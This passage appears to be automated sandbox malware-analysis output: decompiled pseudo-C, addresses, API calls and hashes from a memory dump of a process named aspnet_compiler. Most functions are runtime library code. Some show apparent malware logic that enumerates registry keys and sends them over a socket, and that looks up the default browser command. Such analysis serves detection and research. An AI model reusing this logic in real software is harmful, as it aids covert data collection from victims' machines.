									_t35 = _t46;
									L14:
									_t36 = E0044A2B7(_t46, _t59, _t63, _t59, _t63, _t35);
									_t66 = _t66 + 0xc;
									__eflags = _t36 - 0xffffffff;
									if(_t36 == 0xffffffff) {
										_t37 = E0043EE9A();
										__eflags =  *_t37 - 5;
										if( *_t37 == 5) {
											 *((intOrPtr*)(E0043EEAD())) = 0xd;
										}
										L23:
										_t38 = E0043EEAD();
										E00445002(_t63);
										_t23 =  *_t38;
										goto L31;
									}
									asm("cdq");
									_t46 = _t46 - _t36;
									_t34 = _v8;
									asm("sbb eax, edx");
									_v8 = _t34;
									__eflags = _t34;
									if(__eflags > 0) {
										L12:
										_t35 = 0x1000;
										goto L14;
									}
									if(__eflags < 0) {
										break;
									}
									goto L17;
								}
								if(__eflags > 0) {
									goto L12;
								}
								__eflags = _t46 - 0x1000;
								if(_t46 < 0x1000) {
									goto L13;
								}
								goto L12;
								L17:
								__eflags = _t46;
							} while (_t46 != 0);
							E00442C00(_t56, _t59, _v12);
							E00445002(_t63);
							_t66 = _t66 + 0xc;
							_t61 = 0;
							__eflags = 0;
							goto L19;
						}
						 *((intOrPtr*)(E0043EEAD())) = 0xc;
						goto L23;
					}
					__eflags = _t46;
					if(_t46 <= 0) {
						goto L24;
					}
					goto L6;
				}
				L1:
				return  *((intOrPtr*)(E0043EEAD()));
			}
































                    0x0045551a
                    0x00455524
                    0x00455527
                    0x0045552e
                    0x00455535
                    0x0045553a
                    0x0045553d
                    0x00455543
                    0x00455556
                    0x0045555d
                    0x00455560
                    0x00455562
                    0x00455565
                    0x00000000
                    0x00000000
                    0x0045556b
                    0x0045556b
                    0x0045556d
                    0x0045556d
                    0x00455570
                    0x00455572
                    0x00455575
                    0x00455653
                    0x00455653
                    0x00455655
                    0x0045560c
                    0x00455610
                    0x00455614
                    0x0045561e
                    0x00455621
                    0x004556a2
                    0x004556a2
                    0x004556a4
                    0x00000000
                    0x004556a4
                    0x00455623
                    0x00455628
                    0x00000000
                    0x00455628
                    0x00455657
                    0x0045565d
                    0x0045565e
                    0x00455665
                    0x0045566c
                    0x0045566f
                    0x00455672
                    0x00000000
                    0x00000000
                    0x0045567c
                    0x00455682
                    0x00455684
                    0x00000000
                    0x00000000
                    0x0045568b
                    0x00455691
                    0x0045569e
                    0x00000000
                    0x0045569e
                    0x00455659
                    0x0045565b
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0045565b
                    0x0045557b
                    0x00455585
                    0x00455591
                    0x00455594
                    0x00455595
                    0x00455597
                    0x004555b5
                    0x004555b8
                    0x004555bb
                    0x004555bc
                    0x004555bc
                    0x004555be
                    0x004555d1
                    0x004555d1
                    0x004555d3
                    0x004555d6
                    0x004555db
                    0x004555de
                    0x004555e1
                    0x0045562c
                    0x00455631
                    0x00455634
                    0x0045563b
                    0x0045563b
                    0x00455641
                    0x00455641
                    0x00455649
                    0x0045564f
                    0x00000000
                    0x0045564f
                    0x004555e3
                    0x004555e4
                    0x004555e6
                    0x004555e9
                    0x004555eb
                    0x004555ee
                    0x004555f0
                    0x004555ca
                    0x004555ca
                    0x00000000
                    0x004555ca
                    0x004555f2
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004555f2
                    0x004555c0
                    0x00000000
                    0x00000000
                    0x004555c2
                    0x004555c8
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004555f4
                    0x004555f4
                    0x004555f4
                    0x004555fc
                    0x00455602
                    0x00455607
                    0x0045560a
                    0x0045560a
                    0x00000000
                    0x0045560a
                    0x0045559e
                    0x00000000
                    0x0045559e
                    0x0045557d
                    0x0045557f
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0045557f
                    0x00455545
                    0x00000000

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID: EDE$EDE
                    • API String ID: 269201875-1143427775
                    • Opcode ID: 6c78bc0ecd021690797f9600b798c5c744d82ef1b2dec448d1b2b23438ea67aa
                    • Instruction ID: 88694d13a6d820189563449504a694bd1f50df3e673083fec4fd5d227810db4a
                    • Opcode Fuzzy Hash: 6c78bc0ecd021690797f9600b798c5c744d82ef1b2dec448d1b2b23438ea67aa
                    • Instruction Fuzzy Hash: 83415B31A00944BBEB206BBA8C52A7F3BA5DF45335F24051FFC18C22D3E67C8809566E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00449C3C Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 73%
                    			E00449C3C(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t135;
				signed int _t136;
				void* _t137;

				_t78 =  *0x46f00c; // 0x54ba778e
				_v8 = _t78 ^ _t136;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x470810 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t135 = _a4;
				_v60 = _t86;
				 *_t135 = 0;
				 *((intOrPtr*)(_t135 + 4)) = 0;
				 *((intOrPtr*)(_t135 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x470810 + _v48 * 4));
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00444451(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x470810 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x470810 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x470810 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
							} else {
								_t112 = E004486A2( &_v28, _t133, 2);
								_t137 = _t137 + 0xc;
								if(_t112 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E004486A2();
						_t137 = _t137 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t135 = GetLastError();
								} else {
									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E004338BB(_v8 ^ _t136);
			}


































                    0x00449c44
                    0x00449c4b
                    0x00449c4e
                    0x00449c56
                    0x00449c5a
                    0x00449c66
                    0x00449c69
                    0x00449c6c
                    0x00449c73
                    0x00449c7b
                    0x00449c7e
                    0x00449c84
                    0x00449c8a
                    0x00449c8f
                    0x00449c91
                    0x00449c94
                    0x00449c99
                    0x00449ca3
                    0x00449caa
                    0x00449cad
                    0x00449cb4
                    0x00449cbb
                    0x00449ce7
                    0x00449d0d
                    0x00449d0f
                    0x00000000
                    0x00449ce9
                    0x00449cec
                    0x00449db3
                    0x00449dbf
                    0x00449dca
                    0x00449dcf
                    0x00449cf2
                    0x00449cf9
                    0x00449cfe
                    0x00449d04
                    0x00449d0a
                    0x00000000
                    0x00449d0a
                    0x00449d04
                    0x00449cec
                    0x00449cbd
                    0x00449cc1
                    0x00449cc4
                    0x00449cca
                    0x00449ccc
                    0x00449ccf
                    0x00449cd3
                    0x00449d10
                    0x00449d13
                    0x00449d14
                    0x00449d19
                    0x00449d1f
                    0x00449d25
                    0x00449d34
                    0x00449d3a
                    0x00449d40
                    0x00449d45
                    0x00449d61
                    0x00449dd4
                    0x00449dda
                    0x00449d63
                    0x00449d6b
                    0x00449d74
                    0x00449d7a
                    0x00000000
                    0x00449d7c
                    0x00449d7e
                    0x00449d81
                    0x00449d9a
                    0x00000000
                    0x00449d9c
                    0x00449da0
                    0x00449da2
                    0x00449da5
                    0x00000000
                    0x00449da5
                    0x00449da0
                    0x00449d9a
                    0x00449d7a
                    0x00449d74
                    0x00449d61
                    0x00449d45
                    0x00449d1f
                    0x00000000
                    0x00449da8
                    0x00449da8
                    0x00449ddc
                    0x00449dee

                    APIs
                    • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044A3B1,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00449C7E
                    • __fassign.LIBCMT ref: 00449CF9
                    • __fassign.LIBCMT ref: 00449D14
                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00449D3A
                    • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044A3B1,00000000,?,?,?,?,?,?,?,?,?,0044A3B1,?), ref: 00449D59
                    • WriteFile.KERNEL32(?,?,00000001,0044A3B1,00000000,?,?,?,?,?,?,?,?,?,0044A3B1,?), ref: 00449D92
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                    • String ID:
                    • API String ID: 1324828854-0
                    • Opcode ID: 375b3492dfa092f37ad602e657ac1f80d9a3d9ae5f6776982733ad928ad8e07f
                    • Instruction ID: 2d42c393ae315c603a8a69066ade60cad850b82c9b10e16282d480ace16cedcb
                    • Opcode Fuzzy Hash: 375b3492dfa092f37ad602e657ac1f80d9a3d9ae5f6776982733ad928ad8e07f
                    • Instruction Fuzzy Hash: 1D5181B1E00249AFEB10CFA8D885AEEBBF4EF09300F14416BE955E7291D6749D41CB69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00412FF5 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 86%
                    			E00412FF5(short* __ecx, char __edx, void* __eflags, char _a4) {
				void* _v16;
				char _v28;
				char _v52;
				void* _v56;
				char _v76;
				void* _v80;
				char _v100;
				void* _v104;
				char _v124;
				void* _v128;
				char _v148;
				void* _v152;
				char _v172;
				void* _v176;
				char _v196;
				void* _v200;
				char _v220;
				void* _v224;
				char _v225;
				void* _v228;
				void* _v248;
				void* _v268;
				void* __ebx;
				void* __ebp;
				void* _t28;
				void* _t35;
				void* _t36;
				void* _t61;
				short* _t116;
				void* _t120;
				void* _t123;
				void* _t124;

				_t103 = __edx;
				_t123 =  &_v228 - 0x18;
				_v225 = __edx;
				_t116 = __ecx;
				E004020D6(_t61, _t123, __edx, __eflags,  &_a4);
				_t28 = E00412F64(_t61, __eflags);
				_t124 = _t123 + 0x18;
				_t62 = 0;
				if(RegOpenKeyExW(_t28, _t116, 0, 0x20019,  &_v228) != 0) {
					E00402073(0, _t124 - 0x18, _t103, _t120, "3");
					_push(0x72);
					E00404A81(0x473450, _t103, __eflags);
				} else {
					E00412D3D(_v224, _t103);
					_t35 = E0041A879(0,  &_v28, 0x473420);
					_t36 = E0041A879(0x473408,  &_v52, 0x473408);
					_t129 = _v225;
					_t107 =  ==  ? "0" : "1";
					_t114 = E00402EF0(0x473408,  &_v220, E00402EF0(0x473408,  &_v196, E00402EF0(0x473408,  &_v172, E00402E81( &_v148, E00402EF0(0x473408,  &_v124, E00402E81( &_v100, E004052FE( &_v76,  ==  ? "0" : "1", 0x473420, 0x472ec8), _t36), 0x473420, _v225, 0x472ec8), _t35), 0x473420, _v225, 0x472ec8), 0x473420, _v225, 0x473438), 0x473420, _t129, 0x472ec8);
					E00402EF0(0x473408, _t124 - 0x18, _t44, 0x473420, _t129, 0x4734d0);
					_push(0x71);
					E00404A81(0x473450, _t44, _t129);
					E00401FB8();
					E00401FB8();
					E00401FB8();
					E00401FB8();
					E00401FB8();
					E00401FB8();
					E00401FB8();
					E00401FB8();
					E00401FB8();
					L004086CB(0x473408, 0x473420, _t44, 0x46a8f0);
					L004086CB(0x473408, 0x473408, _t114, 0x46a8f0);
					L00405A86(0x473408, 0x473438, _t114, 0x464074);
					L00405A86(0x473408, 0x4734d0, _t114, 0x464074);
					RegCloseKey(_v268);
					_t62 = 1;
				}
				E00401FB8();
				return _t62;
			}



































                    0x00412ff5
                    0x00412fff
                    0x00413002
                    0x00413006
                    0x00413012
                    0x00413017
                    0x0041301c
                    0x00413023
                    0x00413036
                    0x004131b0
                    0x004131b5
                    0x004131bc
                    0x0041303c
                    0x00413040
                    0x00413069
                    0x0041307e
                    0x00413083
                    0x0041309b
                    0x004130f5
                    0x004130f9
                    0x004130ff
                    0x00413106
                    0x0041310f
                    0x00413118
                    0x00413121
                    0x0041312a
                    0x00413133
                    0x0041313f
                    0x0041314b
                    0x00413157
                    0x00413163
                    0x00413170
                    0x00413178
                    0x00413188
                    0x00413193
                    0x0041319c
                    0x004131a2
                    0x004131a2
                    0x004131c8
                    0x004131d9

                    APIs
                    • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 0041302E
                      • Part of subcall function 00412D3D: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00412DA4
                      • Part of subcall function 00412D3D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00412DD3
                      • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                    • RegCloseKey.ADVAPI32(00000000,00464074,00464074,0046A8F0,0046A8F0,00000071), ref: 0041319C
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseEnumInfoOpenQuerysend
                    • String ID: 4G$84G$P4G$P4G
                    • API String ID: 3114080316-1145574035
                    • Opcode ID: 7db01c843e7112b3844490c1095cc6af0e2be8480158fc6476740f208906a5c3
                    • Instruction ID: fd6b18073abc04bee90befd91301638a83fdde0089edac9dbf0f47121c2ff828
                    • Opcode Fuzzy Hash: 7db01c843e7112b3844490c1095cc6af0e2be8480158fc6476740f208906a5c3
                    • Instruction Fuzzy Hash: 6841F6316442005BC318FB65D992AEFB3989FD0348F40893FF149631D2EF7C5A0A969E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A1E5 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON
                    Download Yara Rule
                    C-Code - Quality: 86%
                    			E0041A1E5(void* __ecx, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t23;
				intOrPtr* _t25;
				intOrPtr* _t27;
				void* _t34;
				void* _t43;
				char* _t50;
				void* _t57;
				void* _t60;
				void* _t61;
				void* _t65;

				_t65 = __eflags;
				_t34 = __ecx;
				E00412903(__ecx, 0x80000000, L"http\\shell\\open\\command", 0);
				E004440A5(E00401EE4(_t34));
				E00401EF3(_t34, 0x80000000, _t57, E00408682(_t34,  &_v44, 0, E0041B7DE(_t34, L".exe") + 4));
				E00401EE9();
				_t43 = _t61 - 0x18;
				E004086D0(_t34, _t43, 0x80000000, _t65, _t34);
				_push(_t43);
				E00401EF3(_t34, 0x80000000, _t57, E0041A89D( &_v44, 0x80000000));
				E00401EE9();
				_t23 = E004022E5(_t34,  &_v8);
				_t25 = E004022AA(_t34,  &_v12);
				_t7 =  &_v16; // 0x40eb54
				_t27 = E004022E5(_t34, _t7);
				_t50 =  &_v20;
				E00409291(_t50,  *_t27,  *_t25,  *_t23);
				if(E0041AB12(_t50) != 0) {
					_push(_t50);
					_t56 = L"program files\\";
					_t59 = E0041B7DE(_t34, L"program files\\");
					if(_t31 != 0xffffffff) {
						E0041B84F(_t34, _t34, 0x80000000, _t56, _t60, _t59, E0043A3D6(L"program files\\"), L"program files (x86)\\");
					}
				}
				return _t34;
			}






















                    0x0041a1e5
                    0x0041a1fa
                    0x0041a1fc
                    0x0041a20b
                    0x0041a230
                    0x0041a238
                    0x0041a240
                    0x0041a243
                    0x0041a248
                    0x0041a257
                    0x0041a25f
                    0x0041a26a
                    0x0041a277
                    0x0041a280
                    0x0041a284
                    0x0041a28b
                    0x0041a292
                    0x0041a2a1
                    0x0041a2a3
                    0x0041a2a4
                    0x0041a2b1
                    0x0041a2b6
                    0x0041a2c8
                    0x0041a2c8
                    0x0041a2b6
                    0x0041a2d5

                    APIs
                      • Part of subcall function 00412903: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,00473298), ref: 00412925
                      • Part of subcall function 00412903: RegQueryValueExW.ADVAPI32(?,0@,00000000,00000000,?,00000400), ref: 00412944
                      • Part of subcall function 00412903: RegCloseKey.ADVAPI32(?), ref: 0041294D
                      • Part of subcall function 0041AB12: GetCurrentProcess.KERNEL32(?,?,?,0040CFAE,WinDir,00000000,00000000), ref: 0041AB23
                    • _wcslen.LIBCMT ref: 0041A2BE
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                    • String ID: .exe$T@$http\shell\open\command$program files (x86)\$program files\
                    • API String ID: 37874593-902212947
                    • Opcode ID: 7143235bfe4027bcb31dec2376d12d4f12f2f92bf4d0ba9bee30b46b709c1ee2
                    • Instruction ID: 21aed5fb5d72de47c87afb81655524ea1d35e8d6521c3cb27bca8a170edf9ba1
                    • Opcode Fuzzy Hash: 7143235bfe4027bcb31dec2376d12d4f12f2f92bf4d0ba9bee30b46b709c1ee2
                    • Instruction Fuzzy Hash: 0E218871B001042BDB04BAB69C96EEE32AD9B44318F14057FF806B72C2ED7D9D5947AD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00455453 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 90%
                    			E00455453(char* _a4, short* _a8) {
				int _v8;
				void* __ecx;
				void* __esi;
				short* _t10;
				short* _t14;
				int _t15;
				short* _t16;
				void* _t26;
				int _t27;
				void* _t29;
				short* _t35;
				short* _t39;
				short* _t40;

				_push(_t29);
				if(_a4 != 0) {
					_t39 = _a8;
					__eflags = _t39;
					if(__eflags != 0) {
						_push(_t26);
						E00446E61(_t29, _t39, __eflags);
						asm("sbb ebx, ebx");
						_t35 = 0;
						_t27 = _t26 + 1;
						 *_t39 = 0;
						_t10 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, 0, 0);
						_v8 = _t10;
						__eflags = _t10;
						if(_t10 != 0) {
							_t40 = E00444A38(_t29, _t10 + _t10);
							__eflags = _t40;
							if(_t40 != 0) {
								_t15 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, _t40, _v8);
								__eflags = _t15;
								if(_t15 != 0) {
									_t16 = _t40;
									_t40 = 0;
									_t35 = 1;
									__eflags = 1;
									 *_a8 = _t16;
								} else {
									E0043EE77(GetLastError());
								}
							}
							E00445002(_t40);
							_t14 = _t35;
						} else {
							E0043EE77(GetLastError());
							_t14 = 0;
						}
					} else {
						 *((intOrPtr*)(E0043EEAD())) = 0x16;
						E0043A5BB();
						_t14 = 0;
					}
					return _t14;
				}
				 *((intOrPtr*)(E0043EEAD())) = 0x16;
				E0043A5BB();
				return 0;
			}
















                    0x00455458
                    0x0045545d
                    0x00455477
                    0x0045547a
                    0x0045547c
                    0x00455495
                    0x00455497
                    0x0045549e
                    0x004554a0
                    0x004554a9
                    0x004554aa
                    0x004554ae
                    0x004554b4
                    0x004554b7
                    0x004554b9
                    0x004554d3
                    0x004554d6
                    0x004554d8
                    0x004554e5
                    0x004554eb
                    0x004554ed
                    0x00455501
                    0x00455503
                    0x00455507
                    0x00455507
                    0x00455508
                    0x004554ef
                    0x004554f6
                    0x004554fb
                    0x004554ed
                    0x0045550b
                    0x00455510
                    0x004554bb
                    0x004554c2
                    0x004554c7
                    0x004554c7
                    0x0045547e
                    0x00455483
                    0x00455489
                    0x0045548e
                    0x0045548e
                    0x00000000
                    0x00455515
                    0x00455464
                    0x0045546a
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1937e19eed58fd6eaa34ed345285247f5b202f0c51715d77c7ab66ce3919d979
                    • Instruction ID: 243b992db74428a8b8f40e07f5805634c7787d5acd7d10a8c2111fadf3c51f9b
                    • Opcode Fuzzy Hash: 1937e19eed58fd6eaa34ed345285247f5b202f0c51715d77c7ab66ce3919d979
                    • Instruction Fuzzy Hash: A6112731505605BBDB102F779C0597B3BA9EF86336B11066AFC11C7252EA38C8459269
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0044F77A Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0044F77A(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E0044F4C1(_t45, 7);
					E0044F4C1(_t45 + 0x1c, 7);
					E0044F4C1(_t45 + 0x38, 0xc);
					E0044F4C1(_t45 + 0x68, 0xc);
					E0044F4C1(_t45 + 0x98, 2);
					E00445002( *((intOrPtr*)(_t45 + 0xa0)));
					E00445002( *((intOrPtr*)(_t45 + 0xa4)));
					E00445002( *((intOrPtr*)(_t45 + 0xa8)));
					E0044F4C1(_t45 + 0xb4, 7);
					E0044F4C1(_t45 + 0xd0, 7);
					E0044F4C1(_t45 + 0xec, 0xc);
					E0044F4C1(_t45 + 0x11c, 0xc);
					E0044F4C1(_t45 + 0x14c, 2);
					E00445002( *((intOrPtr*)(_t45 + 0x154)));
					E00445002( *((intOrPtr*)(_t45 + 0x158)));
					E00445002( *((intOrPtr*)(_t45 + 0x15c)));
					return E00445002( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}




                    0x0044f780
                    0x0044f785
                    0x0044f78e
                    0x0044f799
                    0x0044f7a4
                    0x0044f7af
                    0x0044f7bd
                    0x0044f7c8
                    0x0044f7d3
                    0x0044f7de
                    0x0044f7ec
                    0x0044f7fa
                    0x0044f80b
                    0x0044f819
                    0x0044f827
                    0x0044f832
                    0x0044f83d
                    0x0044f848
                    0x00000000
                    0x0044f858
                    0x0044f85d

                    APIs
                      • Part of subcall function 0044F4C1: _free.LIBCMT ref: 0044F4EA
                    • _free.LIBCMT ref: 0044F7C8
                      • Part of subcall function 00445002: RtlFreeHeap.NTDLL(00000000,00000000,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?), ref: 00445018
                      • Part of subcall function 00445002: GetLastError.KERNEL32(?,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?,?), ref: 0044502A
                    • _free.LIBCMT ref: 0044F7D3
                    • _free.LIBCMT ref: 0044F7DE
                    • _free.LIBCMT ref: 0044F832
                    • _free.LIBCMT ref: 0044F83D
                    • _free.LIBCMT ref: 0044F848
                    • _free.LIBCMT ref: 0044F853
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                    • Instruction ID: e20f7d93c4c1b7366c41c1c89a5bca39aa981d096f5eec7d46ef9b7b16274198
                    • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                    • Instruction Fuzzy Hash: C7117F71540B54AAEA30BBB2CC47FCF779C9F50708F81492FB39DA6052EA2CB5188794
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004106A6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                    Download Yara Rule
                    C-Code - Quality: 90%
                    			E004106A6(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				void* _v8;
				char _v12;
				char _v24;
				intOrPtr _v36;
				intOrPtr* _t34;
				void* _t39;
				intOrPtr* _t42;
				intOrPtr* _t44;

				E00433BCB( &_v12, 0);
				_t39 =  *0x474a78;
				_v8 = _t39;
				_t42 = E0040D696(_a4, E0040D5C5(0x474c68));
				if(_t42 != 0) {
					L5:
					E00433C23( &_v12);
					return _t42;
				} else {
					if(_t39 == 0) {
						__eflags = E0041076A(__ebx, __edx,  &_v8, _a4) - 0xffffffff;
						if(__eflags == 0) {
							_t34 =  &_v24;
							E0040D491(_t34);
							E004379F6( &_v24, 0x46cd4c);
							asm("int3");
							_push(_t42);
							_t44 = _t34;
							E0040D38B(_t34, _v36);
							 *_t44 = 0x4582f4;
							return _t44;
						} else {
							_t42 = _v8;
							 *0x474a78 = _t42;
							 *((intOrPtr*)( *_t42 + 4))();
							E00433DDC(__eflags, _t42);
							goto L5;
						}
					} else {
						_t42 = _t39;
						goto L5;
					}
				}
			}











                    0x004106b3
                    0x004106b8
                    0x004106c3
                    0x004106d4
                    0x004106d8
                    0x0041070c
                    0x0041070f
                    0x0041071b
                    0x004106da
                    0x004106dc
                    0x004106f0
                    0x004106f3
                    0x0041071c
                    0x0041071f
                    0x0041072d
                    0x00410732
                    0x00410733
                    0x00410738
                    0x0041073a
                    0x0041073f
                    0x00410748
                    0x004106f5
                    0x004106f5
                    0x004106fa
                    0x00410702
                    0x00410706
                    0x00000000
                    0x0041070b
                    0x004106de
                    0x004106de
                    0x00000000
                    0x004106de
                    0x004106dc

                    APIs
                    • std::_Lockit::_Lockit.LIBCPMT ref: 004106B3
                    • int.LIBCPMT ref: 004106C6
                      • Part of subcall function 0040D5C5: std::_Lockit::_Lockit.LIBCPMT ref: 0040D5D6
                      • Part of subcall function 0040D5C5: std::_Lockit::~_Lockit.LIBCPMT ref: 0040D5F0
                    • std::_Facet_Register.LIBCPMT ref: 00410706
                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0041070F
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041072D
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                    • String ID: hLG
                    • API String ID: 2536120697-233936816
                    • Opcode ID: fe1dd14917883f67ba224efd1dee7036d7affe31d0fcfbb40d479355fe81f6d9
                    • Instruction ID: 7c3c20e224a2a00f7f7be6237b00d9c90688f6040d3be4d1753458cdbc359952
                    • Opcode Fuzzy Hash: fe1dd14917883f67ba224efd1dee7036d7affe31d0fcfbb40d479355fe81f6d9
                    • Instruction Fuzzy Hash: 96110A32900218ABCB11FBE5C8418DEBB689F84724F11056FF815672D1DF78AE85CBD8
                    Uniqueness

